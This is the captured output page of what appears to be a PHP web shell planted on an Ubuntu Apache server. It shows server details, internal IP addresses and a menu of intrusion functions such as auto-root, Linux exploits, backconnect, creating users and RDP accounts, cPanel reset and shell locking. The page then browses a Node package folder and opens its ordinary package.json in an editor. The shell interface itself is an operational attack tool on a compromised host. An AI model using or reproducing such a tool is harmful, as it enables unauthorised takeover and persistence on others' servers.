Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
utf-8-validate /
[ HOME SHELL ]
Name
Size
Permission
Action
deps
[ DIR ]
drwxrwxr-x
prebuilds
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
LICENSE
2.46
KB
-rw-rw-r--
README.md
1.16
KB
-rw-rw-r--
binding.gyp
525
B
-rw-rw-r--
fallback.js
1.59
KB
-rw-rw-r--
index.js
136
B
-rw-rw-r--
package.json
1.26
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "utf-8-validate", "version": "6.0.3", "description": "Check if a buffer contains valid UTF-8", "main": "index.js", "engines": { "node": ">=6.14.2" }, "scripts": { "install": "node-gyp-build", "prebuild": "prebuildify --napi --strip --target=8.11.2", "prebuild-linux-musl-x64": "prebuildify-cross --image alpine --napi --strip --target=8.11.2", "prebuild-darwin-x64+arm64": "prebuildify --arch x64+arm64 --napi --strip --target=8.11.2", "test": "mocha" }, "files": [ "prebuilds/", "src/", "deps/is_utf8/LICENSE-MIT", "deps/is_utf8/include/is_utf8.h", "deps/is_utf8/src/is_utf8.cpp", "binding.gyp", "fallback.js", "index.js" ], "repository": { "type": "git", "url": "https://github.com/websockets/utf-8-validate" }, "keywords": [ "utf-8-validate" ], "author": "Einar Otto Stangvik <einaros@gmail.com> (http://2x.io)", "license": "MIT", "bugs": { "url": "https://github.com/websockets/utf-8-validate/issues" }, "homepage": "https://github.com/websockets/utf-8-validate", "dependencies": { "node-gyp-build": "^4.3.0" }, "devDependencies": { "mocha": "^10.0.0", "node-gyp": "^9.1.0", "prebuildify": "^5.0.0", "prebuildify-cross": "^5.0.0" } }
Close